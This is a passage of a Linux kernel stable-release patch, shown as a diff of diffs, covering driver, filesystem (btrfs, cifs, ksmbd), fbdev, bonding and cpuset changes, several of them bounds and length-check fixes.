+ 		.driver_data = NVME_QUIRK_DMA_ADDRESS_BITS_48, },
+diff --git a/drivers/pinctrl/pinctrl-amd.c b/drivers/pinctrl/pinctrl-amd.c
+index 5e7b82a2b13d0..32c3edaf90385 100644
+--- a/drivers/pinctrl/pinctrl-amd.c
++++ b/drivers/pinctrl/pinctrl-amd.c
+@@ -865,34 +865,32 @@ static const struct pinconf_ops amd_pinconf_ops = {
+ 	.pin_config_group_set = amd_pinconf_group_set,
+ };
+ 
+-static void amd_gpio_irq_init_pin(struct amd_gpio *gpio_dev, int pin)
++static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+ {
+-	const struct pin_desc *pd;
++	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+ 	unsigned long flags;
+ 	u32 pin_reg, mask;
++	int i;
+ 
+ 	mask = BIT(WAKE_CNTRL_OFF_S0I3) | BIT(WAKE_CNTRL_OFF_S3) |
+ 		BIT(INTERRUPT_MASK_OFF) | BIT(INTERRUPT_ENABLE_OFF) |
+ 		BIT(WAKE_CNTRL_OFF_S4);
+ 
+-	pd = pin_desc_get(gpio_dev->pctrl, pin);
+-	if (!pd)
+-		return;
++	for (i = 0; i < desc->npins; i++) {
++		int pin = desc->pins[i].number;
++		const struct pin_desc *pd = pin_desc_get(gpio_dev->pctrl, pin);
+ 
+-	raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+-	pin_reg = readl(gpio_dev->base + pin * 4);
+-	pin_reg &= ~mask;
+-	writel(pin_reg, gpio_dev->base + pin * 4);
+-	raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
+-}
++		if (!pd)
++			continue;
+ 
+-static void amd_gpio_irq_init(struct amd_gpio *gpio_dev)
+-{
+-	struct pinctrl_desc *desc = gpio_dev->pctrl->desc;
+-	int i;
++		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 
+-	for (i = 0; i < desc->npins; i++)
+-		amd_gpio_irq_init_pin(gpio_dev, i);
++		pin_reg = readl(gpio_dev->base + i * 4);
++		pin_reg &= ~mask;
++		writel(pin_reg, gpio_dev->base + i * 4);
++
++		raw_spin_unlock_irqrestore(&gpio_dev->lock, flags);
++	}
+ }
+ 
+ #ifdef CONFIG_PM_SLEEP
+@@ -945,10 +943,8 @@ static int amd_gpio_resume(struct device *dev)
+ 	for (i = 0; i < desc->npins; i++) {
+ 		int pin = desc->pins[i].number;
+ 
+-		if (!amd_gpio_should_save(gpio_dev, pin)) {
+-			amd_gpio_irq_init_pin(gpio_dev, pin);
++		if (!amd_gpio_should_save(gpio_dev, pin))
+ 			continue;
+-		}
+ 
+ 		raw_spin_lock_irqsave(&gpio_dev->lock, flags);
+ 		gpio_dev->saved_regs[i] |= readl(gpio_dev->base + pin * 4) & PIN_IRQ_PENDING;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 8e6f8a6550790..05f4131784629 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -724,6 +724,8 @@ static int axp288_fuel_gauge_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < AXP288_FG_INTR_NUM; i++) {
+ 		pirq = platform_get_irq(pdev, i);
++		if (pirq < 0)
++			continue;
+ 		ret = regmap_irq_get_virq(axp20x->regmap_irqc, pirq);
+ 		if (ret < 0)
+ 			return dev_err_probe(dev, ret, "getting vIRQ %d\n", pirq);
+diff --git a/drivers/power/supply/cros_usbpd-charger.c b/drivers/power/supply/cros_usbpd-charger.c
+index cadb6a0c2cc7e..b6c96376776a9 100644
+--- a/drivers/power/supply/cros_usbpd-charger.c
++++ b/drivers/power/supply/cros_usbpd-charger.c
+@@ -276,7 +276,7 @@ static int cros_usbpd_charger_get_power_info(struct port_data *port)
+ 		port->psy_current_max = 0;
+ 		break;
+ 	default:
+-		dev_err(dev, "Port %d: default case!\n", port->port_number);
++		dev_dbg(dev, "Port %d: default case!\n", port->port_number);
+ 		port->psy_usb_type = POWER_SUPPLY_USB_TYPE_SDP;
+ 	}
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 4f9c1c4179165..36f807b5ec442 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -785,8 +785,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
+-		if (tmp < 0)
+-			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+@@ -825,8 +823,6 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 			 bulk_reg, 4);
+ 	tmp = get_unaligned_be32(bulk_reg);
+-	if (tmp < 0)
+-		tmp = 0;
+ 	boot_charge_mah = ADC_TO_CHARGE_UAH(tmp, charger->res_div) / 1000;
+ 	regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_OCV_VOL_H,
+ 			 bulk_reg, 2);
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 1707d6d144d21..6a1428d453f3e 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -503,9 +503,6 @@ static int ses_enclosure_find_by_addr(struct enclosure_device *edev,
+ 	int i;
+ 	struct ses_component *scomp;
+ 
+-	if (!edev->component[0].scratch)
+-		return 0;
+-
+ 	for (i = 0; i < edev->components; i++) {
+ 		scomp = edev->component[i].scratch;
+ 		if (scomp->addr != efd->addr)
+@@ -596,8 +593,10 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 						components++,
+ 						type_ptr[0],
+ 						name);
+-				else
++				else if (components < edev->components)
+ 					ecomp = &edev->component[components++];
++				else
++					ecomp = ERR_PTR(-EINVAL);
+ 
+ 				if (!IS_ERR(ecomp)) {
+ 					if (addl_desc_ptr) {
+@@ -728,11 +727,6 @@ static int ses_intf_add(struct device *cdev,
+ 			components += type_ptr[1];
+ 	}
+ 
+-	if (components == 0) {
+-		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
+-		goto err_free;
+-	}
+-
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -774,9 +768,11 @@ static int ses_intf_add(struct device *cdev,
+ 		buf = NULL;
+ 	}
+ page2_not_supported:
+-	scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
+-	if (!scomp)
+-		goto err_free;
++	if (components > 0) {
++		scomp = kcalloc(components, sizeof(struct ses_component), GFP_KERNEL);
++		if (!scomp)
++			goto err_free;
++	}
+ 
+ 	edev = enclosure_register(cdev->parent, dev_name(&sdev->sdev_gendev),
+ 				  components, &ses_enclosure_callbacks);
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 2bc8baa90c0f2..fa205be94a4b8 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -823,7 +823,7 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	int oldidx = con2fb_map[unit];
+ 	struct fb_info *info = fbcon_registered_fb[newidx];
+ 	struct fb_info *oldinfo = NULL;
+-	int found, err = 0, show_logo;
++	int err = 0, show_logo;
+ 
+ 	WARN_CONSOLE_UNLOCKED();
+ 
+@@ -841,26 +841,26 @@ static int set_con2fb_map(int unit, int newidx, int user)
+ 	if (oldidx != -1)
+ 		oldinfo = fbcon_registered_fb[oldidx];
+ 
+-	found = search_fb_in_map(newidx);
+-
+-	if (!err && !found) {
++	if (!search_fb_in_map(newidx)) {
+ 		err = con2fb_acquire_newinfo(vc, info, unit);
+-		if (!err)
+-			con2fb_map[unit] = newidx;
++		if (err)
++			return err;
++
++		fbcon_add_cursor_work(info);
+ 	}
+ 
++	con2fb_map[unit] = newidx;
++
+ 	/*
+ 	 * If old fb is not mapped to any of the consoles,
+ 	 * fbcon should release it.
+ 	 */
+-	if (!err && oldinfo && !search_fb_in_map(oldidx))
++	if (oldinfo && !search_fb_in_map(oldidx))
+ 		con2fb_release_oldinfo(vc, oldinfo, info);
+ 
+ 	show_logo = (fg_console == 0 && !user &&
+ 			 logo_shown != FBCON_LOGO_DONTSHOW);
+ 
+-	if (!found)
+-		fbcon_add_cursor_work(info);
+ 	con2fb_map_boot[unit] = newidx;
+ 	con2fb_init_display(vc, info, unit, show_logo);
+ 
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index 14ef3aab76630..221f3cfd13e20 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1116,6 +1116,8 @@ static long do_fb_ioctl(struct fb_info *info, unsigned int cmd,
+ 	case FBIOPUT_VSCREENINFO:
+ 		if (copy_from_user(&var, argp, sizeof(var)))
+ 			return -EFAULT;
++		/* only for kernel-internal use */
++		var.activate &= ~FB_ACTIVATE_KD_TEXT;
+ 		console_lock();
+ 		lock_fb_info(info);
+ 		ret = fbcon_modechange_possible(info, &var);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 883a3671a9774..5b1b5e1a63c8f 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2347,6 +2347,20 @@ static int btrfs_init_csum_hash(struct btrfs_fs_info *fs_info, u16 csum_type)
+ 
+ 	fs_info->csum_shash = csum_shash;
+ 
++	/*
++	 * Check if the checksum implementation is a fast accelerated one.
++	 * As-is this is a bit of a hack and should be replaced once the csum
++	 * implementations provide that information themselves.
++	 */
++	switch (csum_type) {
++	case BTRFS_CSUM_TYPE_CRC32:
++		if (!strstr(crypto_shash_driver_name(csum_shash), "generic"))
++			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
++		break;
++	default:
++		break;
++	}
++
+ 	btrfs_info(fs_info, "using %s (%s) checksum algorithm",
+ 			btrfs_super_csum_name(csum_type),
+ 			crypto_shash_driver_name(csum_shash));
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index abfd7c897075a..e43b16199e22b 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1824,8 +1824,6 @@ static struct dentry *btrfs_mount_root(struct file_system_type *fs_type,
+ 		shrinker_debugfs_rename(&s->s_shrink, "sb-%s:%s", fs_type->name,
+ 					s->s_id);
+ 		btrfs_sb(s)->bdev_holder = fs_type;
+-		if (!strstr(crc32c_impl(), "generic"))
+-			set_bit(BTRFS_FS_CSUM_IMPL_FAST, &fs_info->flags);
+ 		error = btrfs_fill_super(s, fs_devices, data);
+ 	}
+ 	if (!error)
+@@ -1939,6 +1937,8 @@ static void btrfs_resize_thread_pool(struct btrfs_fs_info *fs_info,
+ 	btrfs_workqueue_set_max(fs_info->hipri_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delalloc_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->caching_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_workers, new_pool_size);
++	workqueue_set_max_active(fs_info->endio_meta_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_write_workers, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->endio_freespace_worker, new_pool_size);
+ 	btrfs_workqueue_set_max(fs_info->delayed_workers, new_pool_size);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index b37379b62cc77..ab59faf8a06a7 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -588,11 +588,15 @@ assemble_neg_contexts(struct smb2_negotiate_req *req,
+ 
+ }
+ 
++/* If invalid preauth context warn but use what we requested, SHA-512 */
+ static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* If invalid preauth context warn but use what we requested, SHA-512 */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
+ 	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad preauth context\n");
+ 		return;
+@@ -611,7 +615,11 @@ static void decode_compress_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+-	/* sizeof compress context is a one element compression capbility struct */
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
+ 	if (len < 10) {
+ 		pr_warn_once("server sent bad compression cntxt\n");
+ 		return;
+@@ -633,6 +641,11 @@ static int decode_encrypt_ctx(struct TCP_Server_Info *server,
+ 	unsigned int len = le16_to_cpu(ctxt->DataLength);
+ 
+ 	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
+ 	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
+ 		pr_warn_once("server sent bad crypto ctxt len\n");
+ 		return -EINVAL;
+@@ -679,6 +692,11 @@ static void decode_signing_ctx(struct TCP_Server_Info *server,
+ {
+ 	unsigned int len = le16_to_cpu(pctxt->DataLength);
+ 
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
+ 	if ((len < 4) || (len > 16)) {
+ 		pr_warn_once("server sent bad signing negcontext\n");
+ 		return;
+@@ -720,14 +738,19 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 	for (i = 0; i < ctxt_cnt; i++) {
+ 		int clen;
+ 		/* check that offset is not beyond end of SMB */
+-		if (len_of_ctxts == 0)
+-			break;
+-
+ 		if (len_of_ctxts < sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)(offset + (char *)rsp);
+-		clen = le16_to_cpu(pctx->DataLength);
++		clen = sizeof(struct smb2_neg_context)
++			+ le16_to_cpu(pctx->DataLength);
++		/*
++		 * 2.2.4 SMB2 NEGOTIATE Response
++		 * Subsequent negotiate contexts MUST appear at the first 8-byte
++		 * aligned offset following the previous negotiate context.
++		 */
++		if (i + 1 != ctxt_cnt)
++			clen = ALIGN(clen, 8);
+ 		if (clen > len_of_ctxts)
+ 			break;
+ 
+@@ -748,12 +771,10 @@ static int smb311_decode_neg_context(struct smb2_negotiate_rsp *rsp,
+ 		else
+ 			cifs_server_dbg(VFS, "unknown negcontext of type %d ignored\n",
+ 				le16_to_cpu(pctx->ContextType));
+-
+ 		if (rc)
+ 			break;
+-		/* offsets must be 8 byte aligned */
+-		clen = ALIGN(clen, 8);
+-		offset += clen + sizeof(struct smb2_neg_context);
++
++		offset += clen;
+ 		len_of_ctxts -= clen;
+ 	}
+ 	return rc;
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 4effe8df5ae92..5de7b41d64044 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -872,17 +872,21 @@ static void assemble_neg_contexts(struct ksmbd_conn *conn,
+ }
+ 
+ static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
+-				  struct smb2_preauth_neg_context *pneg_ctxt)
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int len_of_ctxts)
+ {
+-	__le32 err = STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
++	 * which may not be present. Only check for used HashAlgorithms[1].
++	 */
++	if (len_of_ctxts < MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
+ 
+-	if (pneg_ctxt->HashAlgorithms == SMB2_PREAUTH_INTEGRITY_SHA512) {
+-		conn->preauth_info->Preauth_HashId =
+-			SMB2_PREAUTH_INTEGRITY_SHA512;
+-		err = STATUS_SUCCESS;
+-	}
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
+ 
+-	return err;
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
+ }
+ 
+ static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
+@@ -1010,7 +1014,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				break;
+ 
+ 			status = decode_preauth_ctxt(conn,
+-						     (struct smb2_preauth_neg_context *)pctx);
++						     (struct smb2_preauth_neg_context *)pctx,
++						     len_of_ctxts);
+ 			if (status != STATUS_SUCCESS)
+ 				break;
+ 		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
+diff --git a/include/linux/trace.h b/include/linux/trace.h
+index 80ffda8717491..2a70a447184c9 100644
+--- a/include/linux/trace.h
++++ b/include/linux/trace.h
+@@ -33,6 +33,18 @@ struct trace_array;
+ int register_ftrace_export(struct trace_export *export);
+ int unregister_ftrace_export(struct trace_export *export);
+ 
++/**
++ * trace_array_puts - write a constant string into the trace buffer.
++ * @tr:    The trace array to write to
++ * @str:   The constant string to write
++ */
++#define trace_array_puts(tr, str)					\
++	({								\
++		str ? __trace_array_puts(tr, _THIS_IP_, str, strlen(str)) : -1;	\
++	})
++int __trace_array_puts(struct trace_array *tr, unsigned long ip,
++		       const char *str, int size);
++
+ void trace_printk_init_buffers(void);
+ __printf(3, 4)
+ int trace_array_printk(struct trace_array *tr, unsigned long ip,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 7f585e5dd71b8..061fec6fd0152 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -953,6 +953,7 @@ enum {
+ 	HCI_CONN_STK_ENCRYPT,
+ 	HCI_CONN_AUTH_INITIATOR,
+ 	HCI_CONN_DROP,
++	HCI_CONN_CANCEL,
+ 	HCI_CONN_PARAM_REMOVAL_PEND,
+ 	HCI_CONN_NEW_LINK_KEY,
+ 	HCI_CONN_SCANNING,
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index e999f851738bd..768348008d0c9 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -765,13 +765,17 @@ static inline int bond_get_targets_ip(__be32 *targets, __be32 ip)
+ #if IS_ENABLED(CONFIG_IPV6)
+ static inline int bond_get_targets_ip6(struct in6_addr *targets, struct in6_addr *ip)
+ {
++	struct in6_addr mcaddr;
+ 	int i;
+ 
+-	for (i = 0; i < BOND_MAX_NS_TARGETS; i++)
+-		if (ipv6_addr_equal(&targets[i], ip))
++	for (i = 0; i < BOND_MAX_NS_TARGETS; i++) {
++		addrconf_addr_solict_mult(&targets[i], &mcaddr);
++		if ((ipv6_addr_equal(&targets[i], ip)) ||
++		    (ipv6_addr_equal(&mcaddr, ip)))
+ 			return i;
+ 		else if (ipv6_addr_any(&targets[i]))
+ 			break;
++	}
+ 
+ 	return -1;
+ }
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index fac4260366208..e276db7228451 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -550,11 +550,15 @@ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ /*
+  * update task's spread flag if cpuset's page/slab spread flag is set
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_rwsem held. The check can be skipped
++ * if on default hierarchy.
+  */
+-static void cpuset_update_task_spread_flag(struct cpuset *cs,
++static void cpuset_update_task_spread_flags(struct cpuset *cs,
+ 					struct task_struct *tsk)
+ {
++	if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys))
++		return;
++
+ 	if (is_spread_page(cs))
+ 		task_set_spread_page(tsk);
+ 	else
+@@ -1509,7 +1513,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (adding || deleting)
+-		update_tasks_cpumask(parent, tmp->new_cpus);
++		update_tasks_cpumask(parent, tmp->addmask);
+ 
+ 	/*
+ 	 * Set or clear CS_SCHED_LOAD_BALANCE when partcmd_update, if necessary.
+@@ -1766,10 +1770,13 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	/*
+ 	 * Use the cpumasks in trialcs for tmpmasks when they are pointers
+ 	 * to allocated cpumasks.
++	 *
++	 * Note that update_parent_subparts_cpumask() uses only addmask &
++	 * delmask, but not new_cpus.
+ 	 */
+ 	tmp.addmask  = trialcs->subparts_cpus;
+ 	tmp.delmask  = trialcs->effective_cpus;
+-	tmp.new_cpus = trialcs->cpus_allowed;
++	tmp.new_cpus = NULL;
+ #endif
+ 
+ 	retval = validate_change(cs, trialcs);
+@@ -1834,6 +1841,11 @@ static int update_cpumask(struct cpuset *cs, struct cpuset *trialcs,
+ 	}
+ 	spin_unlock_irq(&callback_lock);
+ 
++#ifdef CONFIG_CPUMASK_OFFSTACK
++	/* Now trialcs->cpus_allowed is available */
++	tmp.new_cpus = trialcs->cpus_allowed;
++#endif
++
+ 	/* effective_cpus will be updated here */
+ 	update_cpumasks_hier(cs, &tmp, false);
+ 
+@@ -2157,7 +2169,7 @@ static void update_tasks_flags(struct cpuset *cs)
+ 
+ 	css_task_iter_start(&cs->css, 0, &it);
+ 	while ((task = css_task_iter_next(&it)))
+-		cpuset_update_task_spread_flag(cs, task);
++		cpuset_update_task_spread_flags(cs, task);
+ 	css_task_iter_end(&it);
+ }
+ 
+@@ -2441,6 +2453,20 @@ static int fmeter_getrate(struct fmeter *fmp)
+ 
+ static struct cpuset *cpuset_attach_old_cs;
+ 
++/*
++ * Check to see if a cpuset can accept a new task
++ * For v1, cpus_allowed and mems_allowed can't be empty.
++ * For v2, effective_cpus can't be empty.
++ * Note that in v1, effective_cpus = cpus_allowed.
++ */
++static int cpuset_can_attach_check(struct cpuset *cs)
++{
++	if (cpumask_empty(cs->effective_cpus) ||
++	   (!is_in_v2_mode() && nodes_empty(cs->mems_allowed)))
++		return -ENOSPC;
++	return 0;
++}
++
+ /* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+@@ -2455,16 +2481,9 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+ 
+-	/* allow moving tasks into an empty cpuset if on default hierarchy */
+-	ret = -ENOSPC;
+-	if (!is_in_v2_mode() &&
+-	    (cpumask_empty(cs->cpus_allowed) || nodes_empty(cs->mems_allowed)))
+-		goto out_unlock;
+-
+-	/*
+-	 * Task cannot be moved to a cpuset with empty effective cpus.
+-	 */
+-	if (cpumask_empty(cs->effective_cpus))
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+@@ -2481,7 +2500,6 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+-	ret = 0;
+ out_unlock:
+ 	percpu_up_write(&cpuset_rwsem);
+ 	return ret;
+@@ -2490,25 +2508,46 @@ out_unlock:
+ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
++	struct cpuset *cs;
+ 
+ 	cgroup_taskset_first(tset, &css);
++	cs = css_cs(css);
+ 
+ 	percpu_down_write(&cpuset_rwsem);
+-	css_cs(css)->attach_in_progress--;
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem.  cpus_attach is used only by cpuset_attach()
++ * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+ static cpumask_var_t cpus_attach;
++static nodemask_t cpuset_attach_nodemask_to;
++
++static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
++{
++	percpu_rwsem_assert_held(&cpuset_rwsem);
++
++	if (cs != &top_cpuset)
++		guarantee_online_cpus(task, cpus_attach);
++	else
++		cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
++	/*
++	 * can_attach beforehand should guarantee that this doesn't
++	 * fail.  TODO: have a better way to handle failure here
++	 */
++	WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
++
++	cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
++	cpuset_update_task_spread_flags(cs, task);
++}
+ 
+ static void cpuset_attach(struct cgroup_taskset *tset)
+ {
+-	/* static buf protected by cpuset_rwsem */
+-	static nodemask_t cpuset_attach_nodemask_to;
+ 	struct task_struct *task;
+ 	struct task_struct *leader;
+ 	struct cgroup_subsys_state *css;
+@@ -2523,20 +2562,8 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+-	cgroup_taskset_for_each(task, css, tset) {
+-		if (cs != &top_cpuset)
+-			guarantee_online_cpus(task, cpus_attach);
+-		else
+-			cpumask_copy(cpus_attach, task_cpu_possible_mask(task));
+-		/*
+-		 * can_attach beforehand should guarantee that this doesn't
+-		 * fail.  TODO: have a better way to handle failure here
+-		 */
+-		WARN_ON_ONCE(set_cpus_allowed_ptr(task, cpus_attach));
+-
+-		cpuset_change_task_nodemask(task, &cpuset_attach_nodemask_to);
+-		cpuset_update_task_spread_flag(cs, task);
+-	}
++	cgroup_taskset_for_each(task, css, tset)
++		cpuset_attach_task(cs, task);
+ 
+ 	/*
+ 	 * Change mm for all threadgroup leaders. This is expensive and may
+@@ -3217,6 +3244,68 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	percpu_up_write(&cpuset_rwsem);
+ }
+ 
++/*
++ * In case the child is cloned into a cpuset different from its parent,
++ * additional checks are done to see if the move is allowed.
++ */
++static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++	int ret;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return 0;
++
++	lockdep_assert_held(&cgroup_mutex);
++	percpu_down_write(&cpuset_rwsem);
++
++	/* Check to see if task is allowed in the cpuset */
++	ret = cpuset_can_attach_check(cs);
++	if (ret)
++		goto out_unlock;
++
++	ret = task_can_attach(task, cs->effective_cpus);
++	if (ret)
++		goto out_unlock;
++
++	ret = security_task_setscheduler(task);
++	if (ret)
++		goto out_unlock;
++
++	/*
++	 * Mark attach is in progress.  This makes validate_change() fail
++	 * changes which zero cpus/mems_allowed.
++	 */
++	cs->attach_in_progress++;
++out_unlock:
++	percpu_up_write(&cpuset_rwsem);
++	return ret;
++}
++
++static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
++{
++	struct cpuset *cs = css_cs(cset->subsys[cpuset_cgrp_id]);
++	bool same_cs;
++
++	rcu_read_lock();
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs)
++		return;
++
++	percpu_down_write(&cpuset_rwsem);
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
++	percpu_up_write(&cpuset_rwsem);
++}
++
+ /*
+  * Make sure the new task conform to the current state of its parent,
+  * which could have been changed by cpuset just after it inherits the
+@@ -3224,11 +3313,33 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+  */
+ static void cpuset_fork(struct task_struct *task)
+ {
+-	if (task_css_is_root(task, cpuset_cgrp_id))
++	struct cpuset *cs;
++	bool same_cs;
++
++	rcu_read_lock();
++	cs = task_cs(task);
++	same_cs = (cs == task_cs(current));
++	rcu_read_unlock();
++
++	if (same_cs) {
++		if (cs == &top_cpuset)
++			return;
++
++		set_cpus_allowed_ptr(task, current->cpus_ptr);
++		task->mems_allowed = current->mems_allowed;
+ 		return;
++	}
++
++	/* CLONE_INTO_CGROUP */
++	percpu_down_write(&cpuset_rwsem);
++	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
++	cpuset_attach_task(cs, task);
++
++	cs->attach_in_progress--;
++	if (!cs->attach_in_progress)
++		wake_up(&cpuset_attach_wq);
+ 
+-	set_cpus_allowed_ptr(task, current->cpus_ptr);
+-	task->mems_allowed = current->mems_allowed;
++	percpu_up_write(&cpuset_rwsem);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3241,6 +3352,8 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
+ 	.attach		= cpuset_attach,
+ 	.post_attach	= cpuset_post_attach,
+ 	.bind		= cpuset_bind,
++	.can_fork	= cpuset_can_fork,
++	.cancel_fork	= cpuset_cancel_fork,
+ 	.fork		= cpuset_fork,
+ 	.legacy_cftypes	= legacy_files,
+ 	.dfl_cftypes	= dfl_files,
